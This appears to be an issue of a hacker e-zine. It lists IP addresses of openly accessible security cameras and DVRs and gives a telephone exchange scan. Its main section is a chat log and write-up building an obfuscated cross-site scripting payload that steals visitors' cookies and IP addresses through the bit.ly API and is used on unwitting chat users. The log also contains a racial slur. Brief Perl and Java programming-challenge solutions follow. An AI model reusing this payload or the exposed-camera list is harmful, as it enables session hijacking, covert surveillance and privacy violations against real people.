Camera/DVR Scan-=[ Author: storm-=[ Email: storm@gonullyourself.org-=[ Website: http://gonullyourself.org/Oh, the joys of nmap.Open access (no login)----------------------http://165.98.238.72/view/index.shtmlhttp://165.98.238.75/view/index.shtmlhttp://165.98.238.78/view/index.shtmlhttp://186.1.14.117/view/index.shtmlhttp://24.1.5.61:8082/Simple/index.htmhttp://24.1.10.154:81/http://24.1.12.248:1028/http://24.1.26.48/img/main.cgi?next_file=main.htmhttp://72.250.135.252:1024/img/image.cgi?next_file=main_fs.htmhttp://74.237.69.5/main.cgi?next_file=main.htmhttp://83.227.138.166/main.cgi?next_file=main.htmhttp://75.61.194.41:1024/main.cgi?next_file=index_in.htmhttp://193.87.102.25/img/main.cgi?next_file=main.htmhttp://213.198.245.70/img/main.cgi?next_file=main.htmhttp://74.237.69.5/main.cgi?next_file=main2.htmhttp://pineairewebcam.dyndns.org/http://217.159.181.99/http://193.138.213.166/http://72.2.138.209:81/http://ajs01.dyndns.org/http://62.106.98.204/http://80.54.239.234/http://195.47.194.200/http://78.36.109.5/http://www.zodiac-bg.com/files/Jview.htmhttp://82.107.211.3/http://84.53.31.54/http://129.170.124.12/http://193.178.224.10/http://chrastal.homeip.net:5050/http://194.112.215.163/http://129.70.141.62/http://209.94.75.172/http://75.149.126.138:89/http://67.53.198.178/http://128.103.101.254/http://157.157.79.85/http://208.71.234.122/http://24.25.42.218:52210/http://65.182.241.193/http://216.117.210.183:86/http://203.213.212.174:1365/http://142.217.181.117:89/http://87.243.178.244/http://81.138.9.30:81/http://122.3.81.6:82/http://68.101.243.94:82/http://80.13.146.246/http://64.203.239.75/http://193.251.181.104/http://213.110.240.157/http://216.160.181.242:10083/http://67.242.57.128:86/http://www.rmackey.com/http://71.194.73.80:4343/http://209.117.235.143/http://71.157.136.110:81/http://216.129.211.131/http://217.133.212.61/http://143.107.3.149/http://210.230.126.237:82/http://62.147.232.188/http://216.137.100.129:81/http://210.230.133.76:82/http://222.3.77.52:81/http://222.11.124.75:81/http://116.64.17.198/http://210.249.10.81:81/http://220.217.129.21:81/http://210.249.21.157:82/http://222.1.186.218:81/http://221.119.133.176:81/http://213.160.168.72/http://61.204.127.233:82/http://222.3.114.56:81/http://71.110.145.16:89/http://89.234.195.78/http://99.135.117.196/http://65.99.253.134/http://222.11.60.180:81/http://61.117.29.119:81/http://82.176.123.82/http://66.203.223.50:82/http://24.20.88.10:84/http://24.19.205.82:8095/http://59.133.145.190:82/http://68.16.245.20/http://220.214.128.66:82/http://124.105.235.84/http://222.5.86.181:82/http://210.169.100.66:82/http://222.13.239.47:82/http://208.54.215.145/http://66.35.88.6/http://98.112.171.186:81/http://59.133.146.58:82/http://195.131.161.122:85/http://208.71.217.253:50001/http://220.217.122.193:81/http://222.15.48.210:82/http://220.217.130.205:81/http://98.190.143.254:23/http://200.124.240.142:8086/http://70.154.139.169:83/http://205.250.69.239:81/http://124.45.116.105:81/http://61.204.122.175:82/http://173.46.175.162:32000/Login required--------------https://24.206.4.253/index.htmhttp://24.231.40.38/http://24.231.41.232/http://24.231.50.181/http://24.231.54.90/http://24.244.132.179/http://24.244.134.63/http://24.244.135.87/http://24.244.135.250/http://216.137.0.39/auth.htmlhttp://216.137.11.89/http://24.244.145.66:8080/http://24.244.145.182/http://24.244.146.129/http://24.244.146.192/http://24.244.180.229/http://64.150.197.130/http://64.150.207.20/http://64.150.210.159/http://64.150.220.6/http://64.150.220.67/http://64.150.222.210/http://64.150.231.141/http://64.150.237.8/https://64.150.238.144/auth.htmlhttp://64.150.245.160/http://65.75.92.213/http://65.75.96.59/http://65.75.107.70/http://65.75.114.105/http://65.75.115.236/http://200.4.168.164/http://200.80.109.38/http://186.1.3.18/http://186.1.3.69/http://186.1.10.155/http://190.106.11.19/http://190.106.11.20/http://190.106.14.14/http://190.106.19.67/http://190.184.94.41/http://165.98.224.67/http://165.98.235.2/http://165.98.236.114/http://186.1.14.180/http://186.1.14.181/http://186.1.14.182/http://190.106.11.18/http://190.184.23.39/http://190.184.35.95/http://190.184.40.114/http://190.184.43.97/http://190.184.45.153/http://190.184.72.105/http://190.212.134.190/http://190.212.134.242/http://196.200.49.162/http://24.1.10.135:1050/http://24.1.13.39:8080/http://24.1.16.206/http://186.1.10.156/login.html?1600&1http://190.106.4.27/[==================================================================================================]-=[ 0x0a 303-833-00xx Scan-=[ Author: Shadytel, Inc-=[ Website: http://www.shadytel.com/0001 - Expanded Announcement System (no supe)0002 - Ringout0003 - Ringout0004 - Ringout0005 - Reorder via SS7?0006 - Burst of 2200 hz0007 - Ringout0008 - Busy signal via distant end0009 - 102-type milliwatt, hangs up after ~3 cycles0010 - Same as 00090012 - Busy via SS70013 - Coin deposit rec0018 - LD service restricted rec0020 - Reorder via SS70021 - Ringout0022 - Ringout0030 - Ringout0031 - Ringout0032 - Ringout0034 - Ringout0035 - Ringout0036 - Ringout0037 - Ringout0038 - Modem - 7/E/1, *displays TID:, then garbage, then TID too long. Please try again.*0039 - Something picks up silently after two rings. Faint clicking noise is sometimes audible.0041 - Ringout0057 - 105-type test0058 - Something via SS7? Recheck0065 - rec, "Remember, you must dial one plus your area code, or zero plus your area code and the number for long distance and operator assisted calls."0066 - Dialing 1/0 not necessary rec0067 - Dial 1 first rec0068 - 100-type milliwatt0069 - Dialing 0 not necessary rec0070 - YCDNGT0075 - YCDNGT0076 - CBCAD/call your operator to help you0077 - CBCAD/check your instruction manual0078 - Permanent signal rec0080 - Low tone0081 - Same as 00780082 - Coin deposit rec0083 - LD service restricted rec0084 - CAC error rec0085 - Tandem CBCAD recording?0086 - Dialing CAC not necessary rec0087 - Network difficulties rec0089 - CAC error rec0090 - ACB rec0091 - Busy via SS70098 - Reorder via SS7?0099 - DATU[==================================================================================================]-=[ 0x0b bit.ly Shenanigans (aka, XSS is hard bro)-=[ Author: Silks, elchupathingy-=[ IRC: irc.gonullyourself.org #gnyNow, while we could neatly explain how we built up our implementation of this trick, it wouldn'treally capture our thought process and just general fucking around. At some point, during the earlyhours of the morning, I pondered the idea of grabbing a fellow #gny chatter's IP for the lulz.Knowing that JavaScript has no reliable function for retrieving a client's IP, the best approach wasto use a standard whatismyip.com site to grab the IP. With the IP address theoretically in my hands,I approached elchupathingy for ideas of how to export that information without any server-side ties.After some playing around, we came up with a solution that would gather and store a victim's IPaddress in a clever manner, and then redirect them to a final destination as expected. Here is ourchat log (mildly edited to hide moments of stupidity) which explains how we built this up. -SilksSilks: do you know of a site that is like a persistent xss but not even xss?Silks: will just store info temporarySilks: likeSilks: x.php?q=lolIstolethisguysip:1.1.1.1elchupathingy: could use bit.ly to store itSilks: how soelchupathingy: it stores links you shortenSilks: basically, did you see my XSS, JS+PHP implementation?elchupathingy: don't think soelchupathingy: hmm storing people's info using bit.ly is kind of sly now that i think about itelchupathingy: lolelchupathingy: http://bit.ly/gsfxLpelchupathingy: see what the link expands toSilks: how would you create that though from JS?elchupathingy: one secelchupathingy: "http://api.bitly.com/v3/shorten?login=$bitlylogin&apiKey=$bitlyapi&format=json&longU rl=/search?q=".shit_goes_hereSilks: kelchupathingy: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5be2a28cc9f0b2 52495179&format=json&longUrl=/search?q=lulselchupathingy: just a GET or inclusion should workSilks: I guess if you can see the details in your bit.ly account that will export the infoelchupathingy: http://google.com/search?q=USER:elchupathingy:PASS:lolpasssowrdelchupathingy: thats what it would look likeSilks: I know manSilks: but you are ignoring the actual problemSilks: the point is, getting the data from the victims client to youSilks: so if bit.ly account store recently created urlsSilks: then you can access that bit.ly and extract the infoelchupathingy: yaelchupathingy: woot got the cookie via xss and bit.lyelchupathingy: lolelchupathingy: in a ungodly long xss stringSilks: roflSilks: so likeelchupathingy: elchupathingy: lolelchupathingy: ungodly longSilks: winSilks: funny thing isSilks: you can then just bit.ly that long urlelchupathingy: exactly lolelchupathingy: and bit.ly will keep track of the people that click on it lolelchupathingy: at the same time of sending you their cookieSilks: guessing the api can retrieve links tooSilks: so you can probably write a quick app to grab it backelchupathingy: yepelchupathingy: well what ya mean?elchupathingy: short url to the info?Silks: wellSilks: say you wanna xss like 100 peopleSilks: everytime someone gets owned they create a new bit.lySilks: so you write an app that connects to bit.ly api and retrieves new bit.ly'sSilks: and from that grabs the redirect url and parses the dataelchupathingy: maybeelchupathingy: have to look over the api real quickSilks: but yeah you can break it down to two commandselchupathingy: can get the countries for each link, statistics on number of clicks and referrrersSilks: bit_xxs_ify Silks: spits out a bit.ly link that links to the long urlSilks: I guess somehow you'd need to inject what you wantSilks: like "document.cookie"Silks: or just have a menu of all the optionsSilks: bit_xss_ify cookieSilks: bit_xss_ify ipSilks: etcSilks: then you'd needSilks: bitly_to_dataelchupathingy: ok can get the top 100 urlselchupathingy: through their apiSilks: which will grab all your bit.ly urls and push new ones into dbelchupathingy: http://bit.ly/fUGVEOSilks: pro stream musicelchupathingy: click that wanna see if it worksSilks: put it in search boxSilks: didn't exeSilks: https://api-ssl.bitly.com/v3/user/clicks?access_token=BITLY_ASSIGNED_ACCESS_TOKEN&days=7Silks: oh nvmelchupathingy: nah got itelchupathingy: __qca=A0-153091312312-1291239025123263; __utmz=201001501.1201336810.6.6|utmccn=(refer ral)|utmcmd=referral|utmcct=/english/4245268-hf-trance-tiesto-vs-mark-knight-feat-din o-beautiful-world-original-mix.html; TRUID=12957903034531; CKTIME=1301436534; __utma= 251001561.940844074.1295790257.1297648116.1301436811.6Silks: right realtime_linkselchupathingy: lolSilks: what's that?elchupathingy: your clickSilks: lolzSilks: weird how that was referrerSilks: was from a blank tabelchupathingy: yaelchupathingy: but ya works fineSilks: stop stealing mah cookieselchupathingy: nom nom cookiesSilks: ahh it was just cookiesSilks: weird, my cookies show all that info? :\elchupathingy: yaSilks: ahh google analytics bselchupathingy: TRUID=13018098525591; CKTIME=1301809854; popunder=yes; popundr=yes; setover18=1Silks: tracking cookieelchupathingy: thats mineSilks: check my latest oneSilks: secelchupathingy: http://bit.ly/hbMGMA much better lolSilks: WHY?elchupathingy: cats are awesomeelchupathingy: lolelchupathingy: u knowelchupathingy: that hurts my feelingsSilks: roflSilks: was trying to tamper data itSilks: but realised that wasn't the actual cookieelchupathingy: oh hahaSilks: so just spammed your linkSilks: lolzelchupathingy: with hte same thing?Silks: pro musicSilks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179 &format=json&longUrl=/search?q=ELCHUPATHINGY_IS_A_NIGGERelchupathingy: doesn't work with the same thing lolSilks: i can change the cookie in tamper dataSilks: butSilks: the js is grabbing document.cookieSilks: and I can't change the urlSilks: maybe in webgoat but cba loading thatelchupathingy: ahelchupathingy: but that hurtselchupathingy: i mean all capsSilks: shutupSilks: you stole my cookieselchupathingy: you clicked the fucking link lolSilks: I trusted you ;(elchupathingy: hahaSilks: bah this is so dumbelchupathingy: lolelchupathingy: hmmelchupathingy: but the bit.ly thing is nice because it guarantees unique cookiesSilks: what do you mean?elchupathingy: it hashes the urlelchupathingy: and my usernameelchupathingy: so if the same person comes to the site the cookie will probably be the same and not be sent againelchupathingy: see if anyone in #gny clicks my link lolSilks: nubSilks: shoulda got it to steal their ipelchupathingy: lolelchupathingy: well too lateSilks: can do it laterelchupathingy: yaelchupathingy: oh thats cool u can modify what the hashes bit.ly goes toelchupathingy: so u could edit the xss as its happening lolelchupathingy: nvm just titleSilks: Silks: weirdSilks: fucking ssi shitelchupathingy: yaelchupathingy: well nvm not getting anything from the two clicks lolSilks: hmmelchupathingy: but there seems to be confusion over what it isSilks: that xss, can you get it to alert?elchupathingy: ya it's the same one i used to get your cookieelchupathingy: just have a feeling they are using noscriptSilks: where is it executing?elchupathingy: in bodySilks: the results span?elchupathingy: Results for Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Edocument.write(document. cookie);%3C/script%3ESilks: ahhSilks: worksSilks: alert doesn'telchupathingy: oh no stringselchupathingy: gets escapedelchupathingy: worksSilks: what I just pasted workselchupathingy: yaSilks: weird that document.alert doesn't workSilks: orSilks: yeah i'm just being dumbelchupathingy: lolSilks: hmmSilks: there is one whatismyip site that returns your ip as text with a specific urlelchupathingy: ya i used thatSilks: linkelchupathingy: secelchupathingy: http://www.whatismyip.com/automation/n09230945.aspSilks: hmmSilks: technically got it workingSilks: but getting owned by access-control-allow-originelchupathingy: getting the ip? or getting it to work as a xss?Silks: printing the ipSilks: once I got it, easymodeSilks: that specific XSS site though doesn't allow for itelchupathingy: ahSilks: hmmSilks: but then, that is odd that yours worksSilks: ahh, something to do with actually accessing the methodSilks: as readystagechange or w/eelchupathingy: im sending the request which is coolSilks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH ttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,4 7,99,104,101,98,107,105,112,46,99,121,110,100,110,115,46,99,111,109,47));x.onreadystatechange =function(){%20alert(x.status);%20};x.send();%3C/script%3ESilks: SAFESilks: honestlySilks: not a dirty liar like youelchupathingy: lolelchupathingy: 0,0,0,0Silks: ?elchupathingy: alert boxesSilks: yeahSilks: that's with x.statusSilks: should be 200Silks: if you fire up JS console you will see the errorelchupathingy: not getting an errorSilks: browser?elchupathingy: ff4Silks: oh it's fucking chromeelchupathingy: im mean i get a error on the page but its there no matter whatelchupathingy: $(document).pngFixelchupathingy: is not a functionSilks: although it's still not quite rightSilks: still should return 200elchupathingy: yaSilks: well it is grabbing 200Silks: something up with codeSilks: meh down to this origin bsSilks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH ttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fromCharCode%28104,116,116 ,112,58,47,47,99,104,101,99,106,105,112,46,100,121,110,100,110,115,46,99,111,109,47%29,true%2 9;x.onreadystatechange=function%28%29{if%28x.readyState%20==%204%29%20{%20if%28x.status%20==% 20200%29%20{%20alert%28x.responseText%29;%20}}};x.send%28null%29;%3C/script%3ESilks: code effectively worksSilks: well maybe, on another hostSilks: but if you can host a file elsewhere then you can either chain JS where it does work or use PHP etcelchupathingy: yaelchupathingy: think i got itelchupathingy: one secelchupathingy: Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x% 20=%20new%20XMLHttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fr omCharCode%28104,116,116,112,58,47,47,96,111,105,46,104,111,115,116,105,112,46,105,11 0,102,111%29,true%29;x.onreadystatechange%20=function%28%29{if%28x.readyState==4%29{a lert%28x.responseText.match%28new%20RegExp%28String.fromCharCode%2892,100,120,49,44,5 1,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49 ,44,51,125%29%29%29%29;}};x.send%28%29;%3C/script%3Eelchupathingy: http://bit.ly/f1Ygcc :DSilks: nice work elchupathingyBarney-: =]Barney-: what happenedSilks: umm, we were messing around with XSSBarney-: rgrSilks: now have XSS code that can steal your IPSilks: well, it grabs the IP, gonna add it to what elchu was working on earlier, storing it in bit.ly linksBarney-: hmmSilks: yeah Barney-, check thisBarney-: ??Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x%20=%20new%20XML HttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47, 47,97,112,105,46,104,111,115,116,105,112,46,105,110,102,111),true);x.onreadystatechange%20=%2 0function(){if(x.readyState==4){alert(x.responseText);}};x.send();%3C/script%3ESilks: this will print the response page of a whatismyip siteBarney-: very coolSilks: I was trying with a different site and it was failingBarney-: thats real cool actuallySilks: elchu tried with that oneSilks: and then used regexSilks: soSilks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=Silks: also we were discussing how to export info and talked about creating bit.ly links with APIsSilks: found out that it is possible to retrieve newly created links in the API tooSilks: so..Barney-: butBarney-: how do you figure outBarney-: the bit.ly linkBarney-: after its been createdSilks: because of a bit.ly accountSilks: soSilks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179 &format=json&longUrl=/search?q=Silks: will create the urlBarney-: ah ok okBarney-: so you login to the accountSilks: and you can export the data but adding it to q=Barney-: but we don't want IPs we want coookiesSilks: iddSilks: soSilks: if you look at the url aboveSilks: you just doSilks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895277c5ce2a29cc9f0b252495179 &format=json&longUrl=/search?q= + document.cookieBarney-: ah rgrSilks: specifically that above looks likeSilks: String.fromCharCode(104,116,116,112,58,47,47,97,112,105,46,98,105,116,108,121,46,99,111,109,4 7,118,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,62,101,108,99,104,117,112,97,1 17,104,105,110,103,121,38,97,112,105,75,101,121,61,82,95,51,49,54,56,57,53,49,55,55,99,53,98, 101,50,97,50,57,99,99,57,102,48,98,50,53,50,52,57,53,49,55,57,38,102,111,114,109,97,116,61,10 6,115,111,110,38,108,111,110,103,85,114,108,61,104,116,116,112,58,47,47,103,111,111,103,108,1 01,46,99,111,109,47,115,101,97,114,99,104,63,113,61).concat(document.cookie));Silks: so since I've woke up and elchu found the ip, I'm gonna combine both of them so it will store an IP in a bit.ly accountBarney-: ya but in what type of attack scenario would IP be helpful?Silks: was saying before, obviously we can just store all this info in the same way I did with my XSS session stealer. call a .php and store it in a dbBarney-: dont get me wrong its cool, just wondering applicationBarney-: could do it easierBarney-: and be likeBarney-: hey visit www.silks.com/index.php?id=4 (where id isn't even a var...)Barney-: it'll 404, and show up in access_logBarney-: voilaSilks: hence what I said above but yeahSilks: this is just a way of doing it without any hosting etcBarney-: trueSilks: and pretty interesting to be storing info in bit.ly linksSilks: that page wouldn't 404 if you just added a get varSilks: funny thing is, when you've made the full XSS you can just package it up in a bit.lySilks: elchu posted it in #gny and a couple of people clicked and didn't even understand what happenedSilks: specifically, Compound and jmp got XSS'ed and knew no betterBarney-: hahahBarney-: a bit.ly starts the XSSBarney-: and ends up in a bit.lyBarney-: hence why I don't trust youBarney-: and i go curl -I silks-dumb-links.comSilks: almost doneSilks: gonna own #gnySilks: Barney-Silks: mind testing this?Silks: http://bit.ly/e93lCUSilks: bit.ly/gvZPM8Barney-: Location: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=Barney-: MIME-Version: 1.0Barney-: Content-Length: 1177Barney-: how do you pass a mime-versionBarney-: with no mime typeSilks: probably to do with the bit.ly linkelchupathingy: just woke upSilks: tricked a few people lolzelchupathingy: ya sawelchupathingy: i was happy with the ip lolelchupathingy: but having to add in the random ass semicolons was annoyingSilks: I'm thinking it might be possible to use browser location tracking to grab dataelchupathingy: probablySilks: you know the browser sends a list of all the access points and macs near youSilks: crazy shitSilks: then you can use those macs with google api to triangulate your positionelchupathingy: never tried to use itSilks: crazy how much data your browser sends thoughelchupathingy: yaSilks: would be lol to XSS->triangulated positionSilks: similar shit to what samy didSilks: but without being a fucking toolelchupathingy: hehelchupathingy: well you can get it but ff asks for permission to get the lat,lngSilks: yeahSilks: but if location tracking is enabled it goes throughelchupathingy: true then its fucking simple lolSilks: you're fucking simpleSilks: think only in the past 6 months-year they started asking users tbhelchupathingy: function loc(p) { alert( p ); }navigator.geolocation.getCurrentPosition(loc);elchupathingy: erelchupathingy: function loc(p){alert(p.coords.latitude+","+p.coords.longitude);};navigator.geolocati on.getCurrentPosition(loc);Silks: listening to that song you stole from my cookiesd4rK3r: who is more awesome then i?http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3cscript%3e%3bvar+x+%3d+new+XMLHttpRequest()%3bx.open(String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c47%2c47%2c97%2c112%2c105%2c46%2c104%2c111%2c115%2c116%2c105%2c112%2c46%2c105%2c110%2c102%2c111)%2ctrue)%3bx.onreadystatechange%3dfunction()%7bif(x.readyState%3d%3d4)%7bvar+ip+%3d+x.responseText.match(new+RegExp(String.fromCharCode(92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125)))%3bvar+y+%3d+new+XMLHttpRequest()%3by.onreadystatechange+%3d+function()%7bif(y.readyState%3d%3d4)window.location%3dString.fromCharCode(103%2c116%2c116%2c112%2c58%2c47%2c47%2c98%2c105%2c116....d%3by.open(+String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c47%2c47%2c97%2c112%2c105%2c46%2c98%2c105%2c116%2c108%2c121%2c46%2c99%2c111%2c109%2c47%2c118%2c51%2c47%2c115%2c104%2c111%2c114%2c116%2c101%2c110%2c63%2c108%2c111%2c103%2c105%2c110%2c61%2c101%2c108%2c99%2c104%2c117%2c112%2c97%2c116%2c104%2c105%2c110%2c103%2c...57%2c99%2c99%2c57%2c102%2c48%2c98%2c50%2c53%2c50%2c52...c61%2c106%2c115%2c111%2c110%2c38%2c108%2c111%2c110%2c103%2c85%2c114%2c108%2c61%2c104%2c116%2c116%2c112%2c58%2c47%2c47%2c103%2...2c97%2c114%2c99%2c104%2c63%2c113%2c61).concat(ip).concat(document.cookie))%3by.send()%3b%7d%3b%7d%3bx.send()%3b%3c%2fscript%3eThis XSS string is the final product of the above discussion, shown above incorporates the grabbingof the user's IP and cookie and utilizing the bit.ly storage method also outlined above. The simple bit.ly API makes this method of cookie grabbing simple and effective. Getting the cookieinformation is a simple request to the bit.ly services, and all of the relevant information will bereturned in a XML or JSON string. Duplicate entries are effectively nulled by how bit.ly hashes theURL to create its shortened ones. Accounts are easily created, and thus the links and storing ofinformation can be distributed amoungst many different bit.ly accounts. This makes it much harder tofind the sole source of the links. A combination with other URL shortening services such as goo.gl,on.fb.me, and tinyurl can make this a very robust method of cookie stealing. The XSS string abovecan be tweaked to hide its real intentions and can effectively work against someone that does notquestion links sent to them.A major weakness of this technique is that it relies on JavaScript, so browsers that employ NoScriptwill not be affected, but utilizing other standard XSS techniques and server-side files could ensurethat if you can't grab both the IP+cookie, you can at least grab an IP. As simple as this techniquemay be, there is a lot more potential for further privacy and security breaches if you can thinkoutside the box. Not to mention that we think storing data in bit.ly is pretty hilarious.[==================================================================================================]-=[ 0x0c Programming Challenge-=[ Author: storm-=[ Email: storm@gonullyourself.org-=[ Website: http://gonullyourself.org/Sorry, no programming challenge this issue. If you have ideas, don't hesitate to shoot us an email.--------------------------------------------------------------------------------Last issue, we asked readers to compare the depth-first search and breadth-first search routingalgorithms against a given graph.Graph Solution by melteLanguage: Perl--------------------#!/usr/bin/perluse strict;use warnings;my $obj = { points => build_tree() };# Uncomment for examples given in the article=podfor ('C', 'D', 'E'){ my $end = breadth_first($obj, 'A', $_); my $mid = depth_first($obj, 'A', $_); print "A -> $_ : DF=$mid BF=$end\n";}exit;=cutfor my $first (sort { $a cmp $b } keys %{$obj->{points}}){ for my $second (sort { $a cmp $b } keys %{$obj->{points}}) { my $df = depth_first($obj, $first, $second); my $bf = breadth_first($obj, $first, $second); my $message = ($df != -1 && $df < $bf) ? "Depth-First" : ($df > $bf && $bf != -1) ? "Breadth-First" : "Tie"; print "$first -> $second : DF=$df, BF=$bf : $message\n"; } }# The data structure I'm using is a hashref with letters as keys,# and an arrayref (as the value) listing its neighbourssub build_tree{ my (@input) = @_; my $vertex = {}; # Not strictly necessary but this + the check below is good for catching typos while ($input[0] =~ /(\w+)[,}]/g) { $vertex->{$1} = []; } while ($input[1] =~ /\{(\w+)\,(\w+)\}/g) { defined $vertex->{$1} and defined $vertex->{$2} or die "Malformed point [$1,$2]"; push @{$vertex->{$1}}, $2; push @{$vertex->{$2}}, $1; } $vertex;}# Setup the structure and enter recursionsub depth_first{ my ($obj, $start, $end ) = @_; $obj = { checked => [], points => $obj->{points} }; $start eq $end and return 0; _depth_first($obj, $start, $end);}# Check all trees from a starting pointsub _depth_first{ my ($obj, $start, $end) = @_; defined $obj->{checked} or $obj->{checked} = []; push @{$obj->{checked}}, $start; for my $neighbour (sort { $a cmp $b } @{$obj->{points}{$start}}) { # We can exclude previously checked items grep { $_ eq $neighbour } @{$obj->{checked}} and next; push @{$obj->{checked}}, $neighbour; $neighbour eq $end and return 1; my $counter = _depth_first($obj, $neighbour, $end); $counter != -1 and return $counter + 1; } return -1;}# Surely there is a pretty and short recursive way to do thissub breadth_first{ my ($obj, $start, $end) = @_; $start eq $end and return 0; my $tree = $obj->{points}{$start}; my $level = 0; @$tree = sort { $a cmp $b } @$tree; while (1) { ++$level; # This problem could exist with a discontinuous graph as input @$tree or return -1; grep { $_ eq $end } @$tree and return $level; # We don't want to add items and then sort # We want to add sorted lists to preserve correct ordering my $temp = []; for my $item ( sort { $a cmp $b } @$tree ) { # Exclude the parent node in this context push @$temp, grep { $_ ne $item } @{$obj->{points}{$item}}; } $tree = $temp; }}# Uncomment for smaller graph from article=pod__DATA__V = {A,B,C,D,E}E = { {A,B},{A,C},{B,C},{B,D},{B,E},{C,D},{D,E}}__END__=cut__DATA__V = {A,B,C,D,E,F,G,H}E = { {A,B},{A,D},{A,F},{B,G},{B,H},{C,D},{C,E},{D,E},{D,F},{F,G},{G,H}}--------------------$ perl graph.plA -> A : DF=0, BF=0 : TieA -> B : DF=1, BF=1 : TieA -> C : DF=5, BF=2 : Breadth-FirstA -> D : DF=4, BF=1 : Breadth-FirstA -> E : DF=6, BF=2 : Breadth-FirstA -> F : DF=3, BF=1 : Breadth-FirstA -> G : DF=2, BF=2 : TieA -> H : DF=3, BF=2 : Breadth-FirstB -> A : DF=1, BF=1 : TieB -> B : DF=0, BF=0 : TieB -> C : DF=3, BF=3 : TieB -> D : DF=2, BF=2 : TieB -> E : DF=4, BF=3 : Breadth-FirstB -> F : DF=3, BF=2 : Breadth-FirstB -> G : DF=4, BF=1 : Breadth-FirstB -> H : DF=5, BF=1 : Breadth-FirstC -> A : DF=2, BF=2 : TieC -> B : DF=3, BF=3 : TieC -> C : DF=0, BF=0 : TieC -> D : DF=1, BF=1 : TieC -> E : DF=2, BF=1 : Breadth-FirstC -> F : DF=5, BF=2 : Breadth-FirstC -> G : DF=4, BF=3 : Breadth-FirstC -> H : DF=5, BF=4 : Breadth-FirstD -> A : DF=1, BF=1 : TieD -> B : DF=2, BF=2 : TieD -> C : DF=1, BF=1 : TieD -> D : DF=0, BF=0 : TieD -> E : DF=2, BF=1 : Breadth-FirstD -> F : DF=4, BF=1 : Breadth-FirstD -> G : DF=3, BF=2 : Breadth-FirstD -> H : DF=4, BF=3 : Breadth-FirstE -> A : DF=3, BF=2 : Breadth-FirstE -> B : DF=4, BF=3 : Breadth-FirstE -> C : DF=1, BF=1 : TieE -> D : DF=2, BF=1 : Breadth-FirstE -> E : DF=0, BF=0 : TieE -> F : DF=6, BF=2 : Breadth-FirstE -> G : DF=5, BF=3 : Breadth-FirstE -> H : DF=6, BF=4 : Breadth-FirstF -> A : DF=1, BF=1 : TieF -> B : DF=2, BF=2 : TieF -> C : DF=3, BF=2 : Breadth-FirstF -> D : DF=2, BF=1 : Breadth-FirstF -> E : DF=4, BF=2 : Breadth-FirstF -> F : DF=0, BF=0 : TieF -> G : DF=3, BF=1 : Breadth-FirstF -> H : DF=4, BF=2 : Breadth-FirstG -> A : DF=2, BF=2 : TieG -> B : DF=1, BF=1 : TieG -> C : DF=4, BF=3 : Breadth-FirstG -> D : DF=3, BF=2 : Breadth-FirstG -> E : DF=5, BF=3 : Breadth-FirstG -> F : DF=4, BF=1 : Breadth-FirstG -> G : DF=0, BF=0 : TieG -> H : DF=2, BF=1 : Breadth-FirstH -> A : DF=2, BF=2 : TieH -> B : DF=1, BF=1 : TieH -> C : DF=4, BF=4 : TieH -> D : DF=3, BF=3 : TieH -> E : DF=5, BF=4 : Breadth-FirstH -> F : DF=4, BF=2 : Breadth-FirstH -> G : DF=5, BF=1 : Breadth-FirstH -> H : DF=0, BF=0 : TieBy running this script, we can clearly see from the output that breadth-first search is the winningalgorithm out of the two. However, this is not always the case. Some graphs will be bettertraversed by means of depth-first search, while others will not. A judgment call must be madedepending on the specific scenario. For instance, massive graphs with a target that is many hopsaway from the origin point will more likely be searched by depth-first search simply due to resourcelimitations. Breadth-first search of a massive graph requires many layers upon layers of recursion.An entire "tree" must be stored in memory, which will quickly run low as the tree grows, causingswapping to occur or the system to crash when the available RAM hits zero. With depth-first search,only a single "branch" of recursion is stored in memory, requiring much less space.--------------------Additionally, as an amendment to issue #3, we missed a solution submitted by Suzaku for thechallenge of writing any one of a number of bit adders.Ripple-Carry Adder by SuzakuLanguage: Java--------------------import java.util.Scanner;class adder{ public static void main(String args[]){ int bitS[],obA[],obB[],i,cin=0,cout=0; String bitA,bitB; char a,b; Scanner input=new Scanner(System.in); obA=new int[100]; obB=new int[100]; bitS=new int[100]; System.out.println("Enter the bit pattern A"); bitA=new StringBuffer(input.next()).reverse().toString(); System.out.println("Enter the bit pattern B"); bitB=new StringBuffer(input.next()).reverse().toString(); if(bitA.length()==bitB.length()){ System.out.print("Sum = "); for(i=0; i 0; i--) System.out.print(bitS[i-1]); System.out.print("\nCarry = "+cout); } else System.out.print("Length of A and B should be same"); }}[==================================================================================================]-=[ 0x0d The Scoop on LIGATTLIGATT Security International (more commonly known as just LIGATT) is a security company founded andrun by the (in)famous Gregory D. Evans. Evans is mainly known for his claim of being the "world'snumber 1 hacker" and his ability to teach anyone to be the same in 15 minutes through one of hiscompany's educational courses. Much controversy surrounds Evans and his company with allegations ofsevere debt, shady marketing schemes, and and overall lack of security knowledge necessary toprovide 